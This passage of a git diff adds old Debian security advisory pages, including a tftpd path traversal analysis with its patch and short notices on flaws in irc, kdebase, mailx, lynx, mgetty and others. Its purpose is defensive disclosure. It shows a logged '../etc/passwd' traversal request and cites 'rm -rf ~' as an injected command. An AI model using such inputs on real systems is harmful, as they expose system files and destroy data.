+</em> + + tftpd in FreeBSD distribution uses chroot() and sets its uid to nobody. +I don't think, it does anything reasonable with groups. <p> + +But... I've looked at both Linux (NetKit 0.09) and FreeBSD (2.2-ALPHA) +tftpd and found rather strange code in Linux tftpd's validate_access() +function: <p> + +<pre> + syslog(LOG_ERR, "tftpd: trying to get file: %s\n", filename); + + if (*filename != '/') { + syslog(LOG_ERR, "tftpd: serving file from %s\n", dirs[0]); + chdir(dirs[0]); + } else { + for (dirp = dirs; *dirp; dirp++) + if (strncmp(filename, *dirp, strlen(*dirp)) == 0) + break; + if (*dirp==0 && dirp!=dirs) + return (EACCESS); + } + /* + * prevent tricksters from getting around the directory restrictions + */ + for (cp = filename + 1; *cp; cp++) + if(*cp == '.' && strncmp(cp-1, "/../", 4) == 0) + return(EACCESS); +</pre> + +...it checks _only_ for "/../" and start _always_ from the second +character in the filename (in other words, if filename is empty, it will +"analyze" the memory after it where other piece of code places mode, so at +least it won't do anything destructive). But it also assumes all not +starting from '/' filenames to be relative to some directory, and never +checks them for "../" that FreeBSD one does. So (see code above for +locations of calls to syslog()): <p> + +<pre> +Mar 23 06:55:08 phobos in.tftpd[9799]: connect from phobos.illtel.denver.co.us +Mar 23 06:55:08 phobos tftpd[9800]: tftpd: trying to get file: ../etc/passwd +Mar 23 06:55:08 phobos tftpd[9800]: tftpd: serving file from /tftpboot +</pre> + +...and obviously it was /tftpboot/../etc/passwd aka /etc/passwd <p> + + Not that it does any damage by itself, but it definitely wasn't supposed +to do that. FreeBSD tftpd disallows such things. <p> + + According to copyright notices, both tftpd are derived from some old +(1983) Berkeley code, and Linux one has some general clumsiness all over +its code (and default /tftpboot directory didn't exist until 0.09, 0.08 +seems to require the list of directories, or it will just SIGSEGV +on NULL pointer). <p> + +FreeBSD tftpd compiles with command line: <p> + +<pre> + gcc -O -DLOG_FTP=LOG_DAEMON -o tftpd tftpd.c tftpsubs.c +</pre> + +and works fine if -ls /tftpboot is added as options to its command line. +Otherwise it only checks file permissions without even trying to become +"nobody" and thus opens hole for non-executable directories (even if +directory is non-executable for anyone but root, files in it will be +accessible). Also it's necessary to hardlink /dev/log under chroot +directory to keep logging functional. <p> + +P.S. how such umm... not obviously secure code got into tftpd in the first +place after that many revisions that definitely were done to increase +security? After all, changes between NetKit revisions _do_ make sense. <p> + +<b>Return-Path: dholland@hcs.harvard.edu</b> <p> + +<pre> + [tftpd source mapped to /dev/null] + + Finally, it prevents ".." and "." in filename to be used to go up: +</pre> + +He's right; it doesn't block leading ".." in the case where the +filename doesn't begin with "/". <p> + +Someone already caught this and the fix is going to be in the next +release; in the meantime here's a patch. <p> + +It needs an intensive rewrite. Don't hold your breath... :( <p> + +<a href="tftpd.patch">Here</a> is a patch. +</blockquote> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/info/tftpd.patch b/english/security/info/tftpd.patch new file mode 100644 index 00000000000..2c1597c9174 --- /dev/null +++ b/english/security/info/tftpd.patch @@ -0,0 +1,25 @@ +*** tftpd.c 1996/12/29 18:42:40 1.8 +--- tftpd.c 1997/03/08 11:31:00 +*************** +*** 40,44 **** + */ + char rcsid[] = +! "$Id$"; + + /* +--- 40,44 ---- + */ + char rcsid[] = +! "$Id$"; + + /* +*************** +*** 298,301 **** +--- 298,303 ---- + * prevent tricksters from getting around the directory restrictions + */ ++ if (!strncmp(filename, "../", 3)) ++ return EACCESS; + for (cp = filename + 1; *cp; cp++) + if(*cp == '.' && strncmp(cp-1, "/../", 4) == 0) + diff --git a/english/security/info/xfree3.html b/english/security/info/xfree3.html new file mode 100644 index 00000000000..95ede68a295 --- /dev/null +++ b/english/security/info/xfree3.html @@ -0,0 +1,31 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> +Debian takes security very seriously. Most <a href="../index.html">security problems</a> brought +to our attention are corrected within 48 hours. + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<blockquote> +The user X startup scripts sometimes builds a file of commands to run in +/tmp. Another user can swap that file causing the victim to run anything +of their choice (like rm -rf ~) +</blockquote> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/irc.html b/english/security/irc.html new file mode 100644 index 00000000000..fa6d61fa4c5 --- /dev/null +++ b/english/security/irc.html @@ -0,0 +1,82 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: 08 May, 1998 +<P> +<DT>Affected packages: irc prior to versions listed below +<P> +<DT>Brief description: irc potentially permits remote sending of characters to local terminal + <DD>David Holland has reported that a remote IRC II user may send arbitrary +characters - ansi codes - to a users terminal. This is considered +harmful. The following versions fix this problem. +<P> +<DT>Vulnerable: <FONT COLOR="#FF0000">Yes</FONT> +<P> +<DT>Fixed in: Debian GNU/Linux 1.3.1 alias bo + <DD> +<HR> + <DD>Source archives: + <DD>ftp://ftp.debian.org/debian/bo-unstable/source/ircii_2.9.3roof-2.diff.gz + <DD><SMALL>(MD5 checksum: 6418ab451fd013ec6b4251f74375fdb8)</SMALL> + <DD>ftp://ftp.debian.org/debian/bo-unstable/source/ircii_2.9.3roof-2.dsc + <DD><SMALL>(MD5 checksum: 01d8f65733cb298d8a7dbe265b6961d4)</SMALL> + <DD>ftp://ftp.debian.org/debian/bo/source/net/ircii_2.9.3roof.orig.tar.gz + <DD><SMALL>(MD5 checksum: 2c6bc5f6db5305a7947f55ec3b1628dd)</SMALL><P> + + <DD>Intel architecture: + <DD>ftp://ftp.debian.org/debian/bo-unstable/binary/ircii_2.9.3roof-2.deb + <DD><SMALL>(MD5 checksum: fbb335d1df09ba267c8e5d9ac184e0df)</SMALL> +<P>These files will be moved to ftp://ftp.debian.org/debian/bo/source/ and ftp://ftp.debian.org/debian/bo/binary-i386/ at a later time. +<P> +<DT>Fixed in: Debian GNU/Linux pre2.0 alias hamm + <DD> +<HR> + <DD>Source archives: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/net/ircii-pana_0.74p2-7.diff.gz + <DD><SMALL>(MD5 checksum: f465b6dd1efdd898bc8749bf8d5581eb)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/net/ircii-pana_0.74p2-7.dsc + <DD><SMALL>(MD5 checksum: 141bf2ae9160c6cedc50a955f921af20)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/net/ircii-pana_0.74p2.orig.tar.gz + <DD><SMALL>(MD5 checksum: c5d6c7bff4ceac211b0963198a6e1032)</SMALL> + +<P> Intel architecture: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-i386/net/ircii_4.4-2.deb + <DD><SMALL>(MD5 checksum: c2e271d8328e5e09a241de387579ccad)</SMALL> + +<P> Motorola 68k architecture: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-m68k/net/ircii_4.4-2.deb + <DD><SMALL>(MD5 checksum: f79b5259812870b3b5932848d7b30f0e)</SMALL> + +<P> Sparc architecture + <DD>ftp://ftp.debian.org/debian/ + <DD><SMALL>(MD5 checksum: )</SMALL> + +<P> Alpha architecture + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-alpha/net/ircii_4.4-2.deb + <DD><SMALL>(MD5 checksum: 14a8970216968902e3647b30ad07cfd6)</SMALL> + +<P> PowerPC architecture + <DD>ftp://ftp.debian.org/debian/ + <DD><SMALL>(MD5 checksum: )</SMALL> +<P> +<DT>Entered Distribution: 16 May, 1998 +</DL> + +<P><SMALL>Last Modified: May 16, 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/kdebase.html b/english/security/kdebase.html new file mode 100644 index 00000000000..97ed82cd174 --- /dev/null +++ b/english/security/kdebase.html @@ -0,0 +1,73 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: 30 May 1998 +<P> +<DT>Affected packages: kdebase, various releases, see below +<P> +<DT>Brief description: + <DD>Shadow group vulnerable to buffer overflow exploits on systems running klock. + <DD>Also, kvt saves config as root, not user. +<P> +<DT>Vulnerable: <FONT COLOR="#FF0000">Yes</FONT> +<P> +<DT>Fixed in: Debian GNU/Linux 1.3.1 alias bo +<HR> +<P> + <DD>There are no KDE packages for the current stable release of Debian GNU/Linux. However there are backward compiled packages located in bo-unstable. These packages contain vulnerable klock and kvt binaries. +<P> + <DD>Source archives: + <DD>ftp://ftp.debian.org/debian/bo-updates/source/kdebase_Beta2-2.3.diff.gz + <DD><SMALL>(MD5 checksum: 3b116c8fa7c18bf68454e0a1cfe08325)</SMALL> + <DD>ftp://ftp.debian.org/debian/bo-updates/source/kdebase_Beta2-2.3.dsc + <DD><SMALL>(MD5 checksum: 7ac8e17b3e060228c7e319321610aa15)</SMALL> + <DD>ftp://ftp.debian.org/debian/bo-updates/source/kdebase_Beta2.orig.tar.gz + <DD><SMALL>(MD5 checksum: e1136cdfb7e8196f44edbea44ce72539)</SMALL> +<P> + <DD>Intel architecture: + <DD>ftp://ftp.debian.org/debian/bo-updates/binary-i386/kdebase_Beta2-2.3_i386.deb + <DD><SMALL>(MD5 checksum: 78f1f2b6229f2cbb04f6cfe35f6d248f)</SMALL> +<P> + <DD>The files from the incoming directory will be moved into ftp://ftp.debian.org/debian/bo-updates/binary-i386/ and ftp://ftp.debian.org/debian/bo/binary-i386/ at a later time. +<P> +<DT>Fixed in: Debian GNU/Linux pre2.0 alias hamm +<HR> + <DD>Source archives: + <DD>ftp://ftp.debian.org/debian/hamm/contrib/source/x11/kdebase_980312-8.diff.gz + <DD><SMALL>(MD5 checksum: 822329f0180a35b9d1ecec08cb83095a)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/contrib/source/x11/kdebase_980312-8.dsc + <DD><SMALL>(MD5 checksum: 8dbc9b74cddf974d85be563d63650e73)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/contrib/source/x11/kdebase_980312.orig.tar.gz + <DD><SMALL>(MD5 checksum: a77b962bfd16de9e57373aae135a3c90)</SMALL> + +<P> Intel architecture: + <DD>ftp://ftp.debian.org/debian/hamm/contrib/binary-i386/x11/kdebase_980312-8.deb + <DD><SMALL>(MD5 checksum: 313ab365fd504a78563a8e4489d44a3e)</SMALL> + +<P> Motorola 68k architecture: + <DD>ftp://ftp.debian.org/debian/hamm/contrib/binary-m68k/x11/kdebase_980312-8.deb + <DD><SMALL>(MD5 checksum: 487e62a71861e4cbcc67ed251a1a9582)</SMALL> + +<P> +<DT>Entered Distribution: +</DL> + +<P><SMALL>Last Modified: 30 May 1998. +Copyright ©1997, 1998 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + diff --git a/english/security/land.html b/english/security/land.html new file mode 100644 index 00000000000..6913f991d48 --- /dev/null +++ b/english/security/land.html @@ -0,0 +1,33 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Affected packages: + <DD>kernel-package +<DT>Brief description: + <DD>"land" attack. Spoofed SYN packet sent to machine A, using A as the destination + and source, and using the same (free) port for destination and source causes lock-up. +<DT>Vulnerable: + <DD>No, Linux does not appear to be vulnerable +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/ldso.html b/english/security/ldso.html new file mode 100644 index 00000000000..b680b5c3a82 --- /dev/null +++ b/english/security/ldso.html @@ -0,0 +1,35 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Affected package: + <DD>ldso +<DT>Brief description: + <DD>Local users may gain root privileges by exploiting a buffer + overflow in the dynamic linker (ld.so). +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>ldso 1.8.11 or later. +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/libdb.html b/english/security/libdb.html new file mode 100644 index 00000000000..eb0a9e0b3a1 --- /dev/null +++ b/english/security/libdb.html @@ -0,0 +1,32 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Affected packages: + <DD>libdb +<DT>Brief description: +<dd>Libdb includes version of snprintf() function with bound checking disabled. +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>libdb 1.85.4-4, available in bo-updates +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/lincity.html b/english/security/lincity.html new file mode 100644 index 00000000000..c5614d673cd --- /dev/null +++ b/english/security/lincity.html @@ -0,0 +1,42 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>March 17, 1998 +<DT>Affected packages: + <DD>lincity prior to version 1.09-3 with lincity-svga installed. +<DT>Brief description: + <DD>Potential buffer overruns. +<DT>User fix: + <DD>Check if lincity-svga is installed: dpkg -s lincity-svga + <DD>If it is: chmod a-s /usr/games/lincity (or wherever your executable lives). + <DD>This removes the setuid bits. Not a complete fix, but much safer. +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> + <DD>No +<DT>Fixed in: + <DD> +<DT>Entered Distribution: + <DD> +<DT>For more information: + <DD> +</DL> + +<P><SMALL>Last Modified: April 29, 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/lynx.html b/english/security/lynx.html new file mode 100644 index 00000000000..d923c29f15d --- /dev/null +++ b/english/security/lynx.html @@ -0,0 +1,32 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Affected packages: + <DD>lynx +<DT>Brief description: +<dd>Restricted/anonymous lynx users can execute arbitrary commands. +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>lynx 2.7.1-3, available in bo-updates +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/mailx.html b/english/security/mailx.html new file mode 100644 index 00000000000..1e83a77d9e5 --- /dev/null +++ b/english/security/mailx.html @@ -0,0 +1,83 @@ +!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: 31 May 1998 +<P> +<DT>Affected packages: mailx, several versions +<P> +<DT>Brief description: + <DD>prior versions of mailx use insecure method to write to files under /tmp +<P> +<DT>Vulnerable: <FONT COLOR="#FF0000">Yes</FONT> +<P> +<DT>Fixed in: Debian GNU/Linux 1.3.1 alias bo + <DD> +<HR> + <DD>Source archives: + <DD>ftp://ftp.de.debian.org/debian-incoming/mailx_8.1.1-3.1.diff.gz + <DD><SMALL>(MD5 checksum: 6e4dfc44a64514b41f000f1a2e2decaa)</SMALL> + <DD>ftp://ftp.de.debian.org/debian-incoming/mailx_8.1.1-3.1.dsc + <DD><SMALL>(MD5 checksum: aead11aa1c643863aa96cbfe97803efc)</SMALL> + <DD>ftp://ftp.debian.org/debian/bo/source/mail/mailx_8.1.1.orig.tar.gz + <DD><SMALL>(MD5 checksum: c779002cb043b57fd5198ec2032cacb0)</SMALL><P> + + <DD>Intel architecture: + <DD>ftp://ftp.de.debian.org/debian-incoming/mailx_8.1.1-3.1_i386.deb + <DD><SMALL>(MD5 checksum: 08946decb4854280d1392159e988d825)</SMALL> +<P> + <DD>These files from the incoming directory will be moved into ftp://ftp.debian.org/debian/bo-updates/binary-i386/ and ftp://ftp.debian.org/debian/bo/binary-i386/ at a later time. +<P> +<DT>Fixed in: Debian GNU/Linux pre2.0 alias hamm +<HR> + <DD>Source archives: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/mail/mailx_8.1.1-9.diff.gz + <DD><SMALL>(MD5 checksum: 3d821f673166c74d4ef6752a1eedd631)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/mail/mailx_8.1.1-9.dsc + <DD><SMALL>(MD5 checksum: 002f4ce9b72c143257ec4e1dc9a457e2)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/mail/mailx_8.1.1.orig.tar.gz + <DD><SMALL>(MD5 checksum: c779002cb043b57fd5198ec2032cacb0)</SMALL> + +<P> Intel architecture: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-i386/mail/mailx_8.1.1-9.deb + <DD><SMALL>(MD5 checksum: 029a5222f6b991682062c71e62d1282b)</SMALL> + +<P> Motorola 68k architecture: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-m68k/mail/mailx_8.1.1-9.deb + <DD><SMALL>(MD5 checksum: 1cba05cf6c1139b2369631ead45a0afd)</SMALL> + +<P> Sparc architecture + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-sparc/mail/mailx_8.1.1-9.deb + <DD><SMALL>(MD5 checksum: a20afd25d48b8455d042511996994a96)</SMALL> + +<P> Alpha architecture + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-alpha/mail/mailx_8.1.1-9.deb + <DD><SMALL>(MD5 checksum: 4d54d9273ef02565221732a72882534a)</SMALL> + +<P> PowerPC architecture + <DD>ftp://ftp.de.debian.org/debian-incoming/mailx_8.1.1-9_powerpc.deb + <DD><SMALL>(MD5 checksum: 3885660525901723885f40b2f4b7a8a7)</SMALL> +<P> + <DD>The files from the incoming directory will be moved into ftp://ftp.debian.org/debian/hamm/hamm/binary-$arch/mail/ soon. +<P> +<DT>Entered Distribution: +</DL> + +<P><SMALL>Last Modified: 30 May 1998. +Copyright ©1997, 1998 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + diff --git a/english/security/mc.html b/english/security/mc.html new file mode 100644 index 00000000000..bbbeacc1c6c --- /dev/null +++ b/english/security/mc.html @@ -0,0 +1,35 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD> +<DT>Affected packages: + <DD>mc +<DT>Brief description: + <DD>Script problem in mc +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>mc 4.1.22-1bo1 in bo and mc 4.1.22-1 in hamm +<DT>Entered Distribution: + <DD> +</DL> + +<P><SMALL>Last Modified: 20 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/metamail.html b/english/security/metamail.html new file mode 100644 index 00000000000..d7d475cf06f --- /dev/null +++ b/english/security/metamail.html @@ -0,0 +1,34 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>April 9, 1997 +<DT>Affected packages: + <DD>metamail +<DT>Brief description: + <DD>It may be possible to make metamail execute arbitrary commands +<DT>Vulnerable: + <DD>No, debian's metamail uses a safe bourne shell script +<DT>For more information: + <DD><A HREF="info/metamail.html">Alan Cox</A> +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/mgetty.html b/english/security/mgetty.html new file mode 100644 index 00000000000..969b1d7f719 --- /dev/null +++ b/english/security/mgetty.html @@ -0,0 +1,35 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Affected packages: + <DD>mgetty +<DT>Brief description: + <DD>improper quoting of user data in mgetty allowed users to execute + commands as root +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>mgetty 1.1.8 or later +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/minicom.html b/english/security/minicom.html new file mode 100644 index 00000000000..91177e76db3 --- /dev/null +++ b/english/security/minicom.html @@ -0,0 +1,34 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>February 10, 1997 +<DT>Affected Package: + <DD>minicom +<DT>Brief description: + <DD>standard buffer overrun(s) in minicom +<DT>Vulnerable: + <DD>No, minicom is not setuid or setgid. +<DT>For more information: + <DD><a href="info/minicom.html">BugTraq</a> +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/modutils.html b/english/security/modutils.html new file mode 100644 index 00000000000..ddaf878072b --- /dev/null +++ b/english/security/modutils.html @@ -0,0 +1,38 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Affected packages: + <DD>modutils +<DT>Brief description: + <DD>request-route used a lock file in /tmp +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>modutils 2.1.34-5a, but use 2.1.34-8 or later if available +<DT>Note: + <DD>Use of request-route is not recommended. The diald package provides + the same functionality in a much better way. In a future kernel, + support for request-route will be dropped. +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/netstd.html b/english/security/netstd.html new file mode 100644 index 00000000000..119fec5e786 --- /dev/null +++ b/english/security/netstd.html @@ -0,0 +1,35 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD 